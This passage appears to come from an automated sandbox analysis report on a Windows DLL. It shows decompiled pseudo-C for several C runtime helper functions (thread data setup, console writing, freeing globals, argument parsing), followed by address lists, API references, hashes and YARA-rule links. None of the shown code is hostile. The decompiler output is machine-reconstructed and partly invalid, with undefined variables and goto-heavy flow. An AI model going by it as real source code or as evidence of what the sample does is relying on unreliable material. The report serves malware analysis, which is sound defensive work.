                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 167067550-0
                                                                                                                                                                                                                                • Opcode ID: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction ID: b085ce134d80df771b988b60bb94c99560f4084dbd39e7e15acff4a59fea7bc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221C472628315BFEF119F66CC84B5AB7AEEF042647048514E82AD77C0D730DD1087A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9C93, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                			E736D9C93(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t12;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x736eb050; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E736DA236(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E736DBC10(__eflags,  *0x736eb050, _t51);
							if(__eflags != 0) {
								E736D9A91(_t51, 0x736efafc);
								E736DA293(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E736DBC10(__eflags,  *0x736eb050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E736DBC10(0,  *0x736eb050, 0);
							_push(0);
							L9:
							E736DA293();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E736DBBD1(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x736eb050; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E736D9798(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x736eb050; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E736DBC10(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E736DA236(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E736DBC10(__eflags,  *0x736eb050, _t60);
								if(__eflags != 0) {
									E736D9A91(_t60, 0x736efafc);
									E736DA293(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E736DBC10(__eflags,  *0x736eb050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E736DBC10(__eflags,  *0x736eb050, _t20);
								_push(_t60);
								L25:
								E736DA293();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E736DBBD1(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x736eb050; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E736D9798(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x736eb050; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E736DBC10(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t12 = E736DA236(1, 0x364); // executed
										_t54 = _t12;
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E736DBC10(__eflags,  *0x736eb050, _t54);
											if(__eflags != 0) {
												E736D9A91(_t54, 0x736efafc);
												E736DA293(0);
												goto L45;
											} else {
												_t40 = 0;
												E736DBC10(__eflags,  *0x736eb050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E736DBC10(0,  *0x736eb050, 0);
											_push(0);
											L41:
											E736DA293();
											goto L36;
										}
									}
								} else {
									_t54 = E736DBBD1(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x736eb050; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}
























                                                                                                                                                                                                                                0x736d9c93
                                                                                                                                                                                                                                0x736d9c93
                                                                                                                                                                                                                                0x736d9c9e
                                                                                                                                                                                                                                0x736d9ca0
                                                                                                                                                                                                                                0x736d9ca5
                                                                                                                                                                                                                                0x736d9ca8
                                                                                                                                                                                                                                0x736d9cc6
                                                                                                                                                                                                                                0x736d9cc9
                                                                                                                                                                                                                                0x736d9cce
                                                                                                                                                                                                                                0x736d9cd0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cd2
                                                                                                                                                                                                                                0x736d9cde
                                                                                                                                                                                                                                0x736d9ce1
                                                                                                                                                                                                                                0x736d9ce2
                                                                                                                                                                                                                                0x736d9ce4
                                                                                                                                                                                                                                0x736d9d09
                                                                                                                                                                                                                                0x736d9d0b
                                                                                                                                                                                                                                0x736d9d24
                                                                                                                                                                                                                                0x736d9d2b
                                                                                                                                                                                                                                0x736d9d30
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d0d
                                                                                                                                                                                                                                0x736d9d0d
                                                                                                                                                                                                                                0x736d9d16
                                                                                                                                                                                                                                0x736d9d1b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d1b
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9cef
                                                                                                                                                                                                                                0x736d9cf4
                                                                                                                                                                                                                                0x736d9cf5
                                                                                                                                                                                                                                0x736d9cf5
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x736d9ce4
                                                                                                                                                                                                                                0x736d9caa
                                                                                                                                                                                                                                0x736d9cb0
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9cc1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cb6
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9d36
                                                                                                                                                                                                                                0x736d9d3e
                                                                                                                                                                                                                                0x736d9d40
                                                                                                                                                                                                                                0x736d9d42
                                                                                                                                                                                                                                0x736d9d4a
                                                                                                                                                                                                                                0x736d9d4f
                                                                                                                                                                                                                                0x736d9d50
                                                                                                                                                                                                                                0x736d9d55
                                                                                                                                                                                                                                0x736d9d56
                                                                                                                                                                                                                                0x736d9d59
                                                                                                                                                                                                                                0x736d9d73
                                                                                                                                                                                                                                0x736d9d76
                                                                                                                                                                                                                                0x736d9d7b
                                                                                                                                                                                                                                0x736d9d7d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d7f
                                                                                                                                                                                                                                0x736d9d8b
                                                                                                                                                                                                                                0x736d9d8e
                                                                                                                                                                                                                                0x736d9d8f
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9db4
                                                                                                                                                                                                                                0x736d9db6
                                                                                                                                                                                                                                0x736d9dcd
                                                                                                                                                                                                                                0x736d9dd4
                                                                                                                                                                                                                                0x736d9dd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9db8
                                                                                                                                                                                                                                0x736d9dbf
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x736d9d93
                                                                                                                                                                                                                                0x736d9d9a
                                                                                                                                                                                                                                0x736d9d9f
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9d5b
                                                                                                                                                                                                                                0x736d9d61
                                                                                                                                                                                                                                0x736d9d63
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de9
                                                                                                                                                                                                                                0x736d9dec
                                                                                                                                                                                                                                0x736d9ded
                                                                                                                                                                                                                                0x736d9dee
                                                                                                                                                                                                                                0x736d9df5
                                                                                                                                                                                                                                0x736d9df7
                                                                                                                                                                                                                                0x736d9dfc
                                                                                                                                                                                                                                0x736d9dff
                                                                                                                                                                                                                                0x736d9e1d
                                                                                                                                                                                                                                0x736d9e20
                                                                                                                                                                                                                                0x736d9e25
                                                                                                                                                                                                                                0x736d9e27
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e29
                                                                                                                                                                                                                                0x736d9e30
                                                                                                                                                                                                                                0x736d9e35
                                                                                                                                                                                                                                0x736d9e39
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e60
                                                                                                                                                                                                                                0x736d9e62
                                                                                                                                                                                                                                0x736d9e7b
                                                                                                                                                                                                                                0x736d9e82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e6d
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e46
                                                                                                                                                                                                                                0x736d9e4b
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e09
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e9e
                                                                                                                                                                                                                                0x736d9d6c
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9de0
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d44
                                                                                                                                                                                                                                0x736d9d49
                                                                                                                                                                                                                                0x736d9d49

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,736DDF75,00000000,00000001,736DC385,?,736DE432,00000001,?,?,?,736DC31E,?,00000000), ref: 736D9C98
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9CF5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9D2B
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000007,000000FF,?,736DE432,00000001,?,?,?,736DC31E,?,00000000,00000000,736E9C70,0000002C,736DC385), ref: 736D9D36
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction ID: 67a44d6bcc46deb1608fb8d3d85c04aea9b8fb6d16fbc401b6060eff744216a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7111CA332697053BEF1126B68E88F1B26E9F7C3675B380628F529971C8FE7589054118
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DF176, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DF176(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E736DF15F();
					E736DF121();
					_t13 = WriteConsoleW( *0x736eb850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                                                                                                                                                                0x736df193
                                                                                                                                                                                                                                0x736df197
                                                                                                                                                                                                                                0x736df1a4
                                                                                                                                                                                                                                0x736df1a9
                                                                                                                                                                                                                                0x736df1c4
                                                                                                                                                                                                                                0x736df1c4
                                                                                                                                                                                                                                0x736df1ca

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001), ref: 736DF18D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001,?,736DE456,736DC31E), ref: 736DF199
                                                                                                                                                                                                                                  • Part of subcall function 736DF15F: CloseHandle.KERNEL32(FFFFFFFE,736DF1A9,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000,00000001), ref: 736DF16F
                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 736DF1A9
                                                                                                                                                                                                                                  • Part of subcall function 736DF121: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,736DF150,736DEBC2,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF134
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,736DC385,00000000,?,736DEBD5,?,00000001,?,00000001,?,736DDF02,00000000,00000000,00000001,00000000), ref: 736DF1BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                • Opcode ID: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction ID: 95232f7cdbc041a43871ea34cd9a6b5427bee782e7d9b302e20c9f486b7e61d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafeb815edae79d153899c59b6accdaa79fc20fd8e7e5bd3ec8fdb6a8a913c64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F01C37151259BBCF123FD2CC08B8A3F76FB082B2F144450FA1D9A264DA328820EB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D95E1, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D95E1() {

				E736DA293( *0x736efb08);
				 *0x736efb08 = 0;
				E736DA293( *0x736efb0c);
				 *0x736efb0c = 0;
				E736DA293( *0x736ef7ec);
				 *0x736ef7ec = 0;
				E736DA293( *0x736ef7f0);
				 *0x736ef7f0 = 0;
				return 1;
			}



                                                                                                                                                                                                                                0x736d95ea
                                                                                                                                                                                                                                0x736d95f7
                                                                                                                                                                                                                                0x736d95fd
                                                                                                                                                                                                                                0x736d9608
                                                                                                                                                                                                                                0x736d960e
                                                                                                                                                                                                                                0x736d9619
                                                                                                                                                                                                                                0x736d961f
                                                                                                                                                                                                                                0x736d9627
                                                                                                                                                                                                                                0x736d9630

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95EA
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D95FD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D960E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D961F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction ID: b996a84b17f854129880ddc4232b88cba3e0281053167d4f0f7e0ea558b3dc78
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5297ee021d7d605a17a10f33212a850ba32dd53e09148c51bb0070ce930f99cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE01A778963209BDF027F13E60C6453B25F744B003B6401AE40C4A358D7BA4B2AEF88
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8EE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                			E736D8EE0(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E736DB1BE(_t48);
						E736DAC0B(_t48, _t57, 0, 0x736ef548, 0, 0x736ef548, 0x104);
						_t26 =  *0x736ef7f4; // 0x2f133d8
						 *0x736ef7e4 = 0x736ef548;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x736ef548;
							_v20 = 0x736ef548;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E736D9191(E736D9018( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E736D9018( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E736DAAFE(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x736ef7e8 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x736ef7ec = _t58;
											L18:
											E736DA293(_t37);
											_v12 = 0;
											L19:
											E736DA293(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x736ef7e8 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x736ef7ec = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E736DA223(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E736DA223(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E736DA166();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

























                                                                                                                                                                                                                                0x736d8ee0
                                                                                                                                                                                                                                0x736d8ee9
                                                                                                                                                                                                                                0x736d8eee
                                                                                                                                                                                                                                0x736d8ef8
                                                                                                                                                                                                                                0x736d8efb
                                                                                                                                                                                                                                0x736d8f18
                                                                                                                                                                                                                                0x736d8f19
                                                                                                                                                                                                                                0x736d8f2c
                                                                                                                                                                                                                                0x736d8f31
                                                                                                                                                                                                                                0x736d8f39
                                                                                                                                                                                                                                0x736d8f3f
                                                                                                                                                                                                                                0x736d8f42
                                                                                                                                                                                                                                0x736d8f44
                                                                                                                                                                                                                                0x736d8f4b
                                                                                                                                                                                                                                0x736d8f4b
                                                                                                                                                                                                                                0x736d8f4d
                                                                                                                                                                                                                                0x736d8f50
                                                                                                                                                                                                                                0x736d8f53
                                                                                                                                                                                                                                0x736d8f5a
                                                                                                                                                                                                                                0x736d8f73
                                                                                                                                                                                                                                0x736d8f78
                                                                                                                                                                                                                                0x736d8f7a
                                                                                                                                                                                                                                0x736d8f9b
                                                                                                                                                                                                                                0x736d8fa3
                                                                                                                                                                                                                                0x736d8fa6
                                                                                                                                                                                                                                0x736d8fc1
                                                                                                                                                                                                                                0x736d8fc4
                                                                                                                                                                                                                                0x736d8fcb
                                                                                                                                                                                                                                0x736d8fcf
                                                                                                                                                                                                                                0x736d8fd1
                                                                                                                                                                                                                                0x736d8fd8
                                                                                                                                                                                                                                0x736d8fdb
                                                                                                                                                                                                                                0x736d8fdd
                                                                                                                                                                                                                                0x736d8fdf
                                                                                                                                                                                                                                0x736d8fe1
                                                                                                                                                                                                                                0x736d8feb
                                                                                                                                                                                                                                0x736d8feb
                                                                                                                                                                                                                                0x736d8fed
                                                                                                                                                                                                                                0x736d8ff3
                                                                                                                                                                                                                                0x736d8ff6
                                                                                                                                                                                                                                0x736d8ff8
                                                                                                                                                                                                                                0x736d8ffe
                                                                                                                                                                                                                                0x736d8fff
                                                                                                                                                                                                                                0x736d9005
                                                                                                                                                                                                                                0x736d9008
                                                                                                                                                                                                                                0x736d9009
                                                                                                                                                                                                                                0x736d900f
                                                                                                                                                                                                                                0x736d9012
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fe6
                                                                                                                                                                                                                                0x736d8fe7
                                                                                                                                                                                                                                0x736d8fe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fe3
                                                                                                                                                                                                                                0x736d8fd3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fd3
                                                                                                                                                                                                                                0x736d8fab
                                                                                                                                                                                                                                0x736d8fab
                                                                                                                                                                                                                                0x736d8fac
                                                                                                                                                                                                                                0x736d8fb1
                                                                                                                                                                                                                                0x736d8fb3
                                                                                                                                                                                                                                0x736d8fb5
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8fba
                                                                                                                                                                                                                                0x736d8f7c
                                                                                                                                                                                                                                0x736d8f81
                                                                                                                                                                                                                                0x736d8f83
                                                                                                                                                                                                                                0x736d8f84
